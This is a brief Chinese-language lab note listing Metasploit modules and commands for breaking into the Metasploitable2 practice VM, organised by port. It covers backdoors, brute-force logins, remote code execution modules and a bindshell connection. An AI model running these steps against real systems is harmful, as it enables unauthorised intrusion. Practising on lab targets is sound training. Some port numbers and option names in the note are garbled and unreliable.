metasploitable2 很多漏洞的靶机
这个靶机可以自己去网上下载,可以当做入门实战的一部分
msfadmin msfadmin 账号密码
nmap -sV -P0 IP 扫描服务 端口
use exploit/multi/samba/usermap_script 一样
21 search vsftpd 笑脸后门
set rhosts
run
whoami
ifconfig
22 search ssh_login 密码
use 0
set rhosts
set user_flie
set pass_flie
set threads
run 可以直接可以用telnet ip 登入
23 use auxiliary/scanner/telnet/telnet_login
set rhosts
set user_flie
set pass_flie
set threads 可以直接可以用telnet ip 登入
80
use exploit/multi/http/php_cgi_arg_injection (php漏洞)
set rhosts
run
999
use auxiliary/scanner/smb/smb_enumshares 共享
set rhosts
445
use auxiliary/admin/smb/samba_symlink_traversal.
set rhosts
1099 JavaScript
use exploit/multi/misc/java_rmi_server
set rhosts
run
1524
telnet 192.168.75.141 1524
pwd
whoami
ifconfig
3306
use auxiliary/scanner/mysql/mysql_login
set rhosts
set username root 看有没有这个数据库
MySQL 192.168.75.141 -u -p
3362
use exploit/unix/misc/distcc_exec
set rhosts
run